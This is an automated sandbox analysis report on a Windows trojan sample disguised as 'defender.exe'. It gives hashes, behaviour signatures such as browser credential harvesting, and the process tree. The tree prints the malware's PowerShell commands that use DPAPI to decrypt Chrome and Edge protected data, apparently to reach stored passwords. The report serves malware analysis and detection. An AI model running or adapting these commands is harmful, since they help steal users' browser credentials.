Edit tour
Windows
Analysis Report
SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
Overview
General Information
| Sample name: | SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe |
| Analysis ID: | 1487580 |
| MD5: | a4590450863f13aa67198ec0fe52453e |
| SHA1: | 7bc926cf52aa4c390cb7d6ac5756a9b95f6e8fb2 |
| SHA256: | d5628dd0e0710c14d9241a3eb0871dfa4fccf0888f6503d8b9a794cb5e8e6d71 |
| Tags: | exe |
| Infos: |  |
 | |
Detection
| Score: | 60 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Icon mismatch, binary includes an icon from a different legit application in order to fool users
AI detected suspicious sample
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe (PID: 3180 cmdline: "C:\Users\ user\Deskt op\Securit eInfo.com. HEUR.Troja n.Script.G eneric.559 1.10617.ex e" MD5: A4590450863F13AA67198EC0FE52453E) - defender.exe (PID: 7008 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\2goCimW NF4MQsElUG 17heiczRtP \defender. exe MD5: 050F6E0968C055E912AB6CA8DC12A881) 
cmd.exe (PID: 3496 cmdline: C:\Windows \system32\ cmd.exe /d /s /c "ta sklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5432 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
tasklist.exe (PID: 7200 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 7232 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "ta sklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7240 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7308 cmdline:
tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 7248 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "po wershell.e xe Add-Typ e -Assembl yName Syst em.Securit y; [System .Security. Cryptograp hy.Protect edData]::U nprotect([ byte[]]@(1 ,0,0,0,208 ,140,157,2 23,1,21,20 9,17,140,1 22,0,192,7 9,194,151, 235,1,0,0, 0,236,112, 27,63,29,4 5,147,76,1 54,28,167, 163,109,16 6,140,139, 16,0,0,0,2 8,0,0,0,71 ,0,111,0,1 11,0,103,0 ,108,0,101 ,0,32,0,67 ,0,104,0,1 14,0,111,0 ,109,0,101 ,0,0,0,16, 102,0,0,0, 1,0,0,32,0 ,0,0,162,2 23,64,66,6 7,235,252, 176,134,0, 234,34,88, 190,96,79, 120,163,57 ,223,70,18 4,59,55,25 1,103,80,6 6,213,41,7 9,203,0,0, 0,0,14,128 ,0,0,0,2,0 ,0,32,0,0, 0,65,3,137 ,251,132,6 7,165,117, 37,32,77,1 56,77,25,1 14,22,240, 181,235,10 3,91,102,1 17,255,144 ,36,92,249 ,151,253,6 0,75,48,0, 0,0,43,225 ,223,217,1 51,30,78,1 84,8,140,2 33,239,111 ,191,100,2 51,188,228 ,105,81,24 5,79,114,2 15,91,96,1 12,252,70, 126,43,40, 253,217,12 3,23,241,1 00,8,207,1 53,67,107, 184,161,11 3,210,62,6 4,0,0,0,16 ,48,146,16 ,208,228,7 6,223,250, 118,61,199 ,169,142,1 8,65,154,3 0,229,124, 35,149,206 ,81,42,123 ,202,212,1 01,122,75, 162,189,11 3,249,192, 143,80,146 ,46,12,170 ,101,4,63, 156,140,20 1,97,222,2 42,144,253 ,193,232,1 62,242,114 ,34,110,10 2,135,201, 250), $nul l, 'Curren tUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7260 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 7340 cmdline: powershell .exe Add-T ype -Assem blyName Sy stem.Secur ity; [Syst em.Securit y.Cryptogr aphy.Prote ctedData]: :Unprotect ([byte[]]@ (1,0,0,0,2 08,140,157 ,223,1,21, 209,17,140 ,122,0,192 ,79,194,15 1,235,1,0, 0,0,236,11 2,27,63,29 ,45,147,76 ,154,28,16 7,163,109, 166,140,13 9,16,0,0,0 ,28,0,0,0, 71,0,111,0 ,111,0,103 ,0,108,0,1 01,0,32,0, 67,0,104,0 ,114,0,111 ,0,109,0,1 01,0,0,0,1 6,102,0,0, 0,1,0,0,32 ,0,0,0,162 ,223,64,66 ,67,235,25 2,176,134, 0,234,34,8 8,190,96,7 9,120,163, 57,223,70, 184,59,55, 251,103,80 ,66,213,41 ,79,203,0, 0,0,0,14,1 28,0,0,0,2 ,0,0,32,0, 0,0,65,3,1 37,251,132 ,67,165,11 7,37,32,77 ,156,77,25 ,114,22,24 0,181,235, 103,91,102 ,117,255,1 44,36,92,2 49,151,253 ,60,75,48, 0,0,0,43,2 25,223,217 ,151,30,78 ,184,8,140 ,233,239,1 11,191,100 ,251,188,2 28,105,81, 245,79,114 ,215,91,96 ,112,252,7 0,126,43,4 0,253,217, 123,23,241 ,100,8,207 ,153,67,10 7,184,161, 113,210,62 ,64,0,0,0, 16,48,146, 16,208,228 ,76,223,25 0,118,61,1 99,169,142 ,18,65,154 ,30,229,12 4,35,149,2 06,81,42,1 23,202,212 ,101,122,7 5,162,189, 113,249,19 2,143,80,1 46,46,12,1 70,101,4,6 3,156,140, 201,97,222 ,242,144,2 53,193,232 ,162,242,1 14,34,110, 102,135,20 1,250), $n ull, 'Curr entUser') MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7564 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "po wershell.e xe Add-Typ e -Assembl yName Syst em.Securit y; [System .Security. Cryptograp hy.Protect edData]::U nprotect([ byte[]]@(1 ,0,0,0,208 ,140,157,2 23,1,21,20 9,17,140,1 22,0,192,7 9,194,151, 235,1,0,0, 0,236,112, 27,63,29,4 5,147,76,1 54,28,167, 163,109,16 6,140,139, 16,0,0,0,1 0,0,0,0,69 ,0,100,0,1 03,0,101,0 ,0,0,16,10 2,0,0,0,1, 0,0,32,0,0 ,0,177,111 ,46,150,21 2,157,15,4 ,228,252,1 2,0,1,183, 251,108,66 ,54,253,18 9,23,124,8 6,207,222, 56,201,250 ,182,152,2 21,247,0,0 ,0,0,14,12 8,0,0,0,2, 0,0,32,0,0 ,0,178,13, 225,93,214 ,215,151,1 62,72,143, 194,133,19 0,22,214,1 49,170,149 ,74,147,55 ,106,15,18 0,131,73,1 96,197,128 ,118,103,8 9,48,0,0,0 ,94,206,24 2,8,29,35, 27,71,101, 58,135,55, 188,69,108 ,246,46,23 2,119,93,6 5,217,99,7 ,252,165,3 3,164,119, 40,187,209 ,190,181,2 21,12,22,1 10,211,109 ,137,129,9 8,159,150, 234,140,24 4,64,0,0,0 ,160,185,2 10,147,25, 143,46,73, 184,87,79, 38,71,228, 189,220,24 9,51,245,1 32,106,162 ,213,227,4 5,47,24,17 1,45,48,70 ,50,96,105 ,2,105,84, 9,7,23,200 ,91,89,93, 224,1,154, 41,99,254, 68,168,144 ,46,197,12 6,233,182, 158,66,11, 216,163,15 7), $null, 'CurrentU ser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7572 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7612 cmdline:
powershell .exe Add-T ype -Assem blyName Sy stem.Secur ity; [Syst em.Securit y.Cryptogr aphy.Prote ctedData]: :Unprotect ([byte[]]@ (1,0,0,0,2 08,140,157 ,223,1,21, 209,17,140 ,122,0,192 ,79,194,15 1,235,1,0, 0,0,236,11 2,27,63,29 ,45,147,76 ,154,28,16 7,163,109, 166,140,13 9,16,0,0,0 ,10,0,0,0, 69,0,100,0 ,103,0,101 ,0,0,0,16, 102,0,0,0, 1,0,0,32,0 ,0,0,177,1 11,46,150, 212,157,15 ,4,228,252 ,12,0,1,18 3,251,108, 66,54,253, 189,23,124 ,86,207,22 2,56,201,2 50,182,152 ,221,247,0 ,0,0,0,14, 128,0,0,0, 2,0,0,32,0 ,0,0,178,1 3,225,93,2 14,215,151 ,162,72,14 3,194,133, 190,22,214 ,149,170,1 49,74,147, 55,106,15, 180,131,73 ,196,197,1 28,118,103 ,89,48,0,0 ,0,94,206, 242,8,29,3 5,27,71,10 1,58,135,5 5,188,69,1 08,246,46, 232,119,93 ,65,217,99 ,7,252,165 ,33,164,11 9,40,187,2 09,190,181 ,221,12,22 ,110,211,1 09,137,129 ,98,159,15 0,234,140, 244,64,0,0 ,0,160,185 ,210,147,2 5,143,46,7 3,184,87,7 9,38,71,22 8,189,220, 249,51,245 ,132,106,1 62,213,227 ,45,47,24, 171,45,48, 70,50,96,1 05,2,105,8 4,9,7,23,2 00,91,89,9 3,224,1,15 4,41,99,25 4,68,168,1 44,46,197, 126,233,18 2,158,66,1 1,216,163, 157), $nul l, 'Curren tUser') MD5: 04029E121A0CFA5991749937DD22A1D9) - defender.exe (PID: 7828 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\2goCim WNF4MQsElU G17heiczRt P\defender .exe" --ty pe=gpu-pro cess --use r-data-dir ="C:\Users \user\AppD ata\Roamin g\defender " --gpu-pr eferences= UAAAAAAAAA DgAAAYAAAA AAAAAAAAAA AAAABgAAAA AAAwAAAAAA AAAAAAAAAQ AAAAAAAAAA AAAAAAAAAA AAAAAEgAAA AAAAAASAAA AAAAAAAYAA AAAgAAABAA AAAAAAAAGA AAAAAAAAAQ AAAAAAAAAA AAAAAOAAAA EAAAAAAAAA ABAAAADgAA AAgAAAAAAA AACAAAAAAA AAA= --moj o-platform -channel-h andle=1728 --field-t rial-handl e=1892,i,7 3913016229 75608385,1 4743312254 782703774, 131072 --d isable-fea tures=Spar eRendererF orSitePerP rocess,Win RetrieveSu ggestionsO nlyOnDeman d /prefetc h:2 MD5: 050F6E0968C055E912AB6CA8DC12A881) 
explorer.exe (PID: 2580 cmdline: C:\Windows \Explorer. EXE MD5: 662F4F92FDE3557E86D110526BB578D5) - defender.exe (PID: 7912 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\2goCim WNF4MQsElU G17heiczRt P\defender .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-G B --servic e-sandbox- type=none --user-dat a-dir="C:\ Users\user \AppData\R oaming\def ender" --m ojo-platfo rm-channel -handle=21 40 --field -trial-han dle=1892,i ,739130162 2975608385 ,147433122 5478270377 4,131072 - -disable-f eatures=Sp areRendere rForSitePe rProcess,W inRetrieve Suggestion sOnlyOnDem and /prefe tch:8 MD5: 050F6E0968C055E912AB6CA8DC12A881) - defender.exe (PID: 7980 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\2goCim WNF4MQsElU G17heiczRt P\defender .exe" --ty pe=rendere r --user-d ata-dir="C :\Users\us er\AppData \Roaming\d efender" - -app-path= "C:\Users\ user\AppDa ta\Local\T emp\2goCim WNF4MQsElU G17heiczRt P\resource s\app.asar " --no-san dbox --no- zygote --f irst-rende rer-proces s --lang=e n-GB --dev ice-scale- factor=1 - -num-raste r-threads= 2 --enable -main-fram e-before-a ctivation --renderer -client-id =4 --time- ticks-at-u nix-epoch= -172277803 5040302 -- launch-tim e-ticks=40 63477079 - -mojo-plat form-chann el-handle= 2348 --fie ld-trial-h andle=1892 ,i,7391301 6229756083 85,1474331 2254782703 774,131072 --disable -features= SpareRende rerForSite PerProcess ,WinRetrie veSuggesti onsOnlyOnD emand /pre fetch:1 MD5: 050F6E0968C055E912AB6CA8DC12A881) - defender.exe (PID: 3408 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\2goCim WNF4MQsElU G17heiczRt P\defender .exe" --ty pe=gpu-pro cess --dis able-gpu-s andbox --u se-gl=disa bled --gpu -vendor-id =5140 --gp u-device-i d=140 --gp u-sub-syst em-id=0 -- gpu-revisi on=0 --gpu -driver-ve rsion=10.0 .19041.546 --user-da ta-dir="C: \Users\use r\AppData\ Roaming\de fender" -- gpu-prefer ences=UAAA AAAAAADoAA AYAAAAAAAA AAAAAAAAAA BgAAAAAAAw AAAAAAAAAA AAAACQAAAA AAAAAAAAAA AAAAAAAAAA AEgAAAAAAA AASAAAAAAA AAAYAAAAAg AAABAAAAAA AAAAGAAAAA AAAAAQAAAA AAAAAAAAAA AOAAAAEAAA AAAAAAABAA AADgAAAAgA AAAAAAAACA AAAAAAAAA= --mojo-pl atform-cha nnel-handl e=1432 --f ield-trial -handle=18 92,i,73913 0162297560 8385,14743 3122547827 03774,1310 72 --disab le-feature s=SpareRen dererForSi tePerProce ss,WinRetr ieveSugges tionsOnlyO nDemand /p refetch:2 MD5: 050F6E0968C055E912AB6CA8DC12A881)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |   |
|---|
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||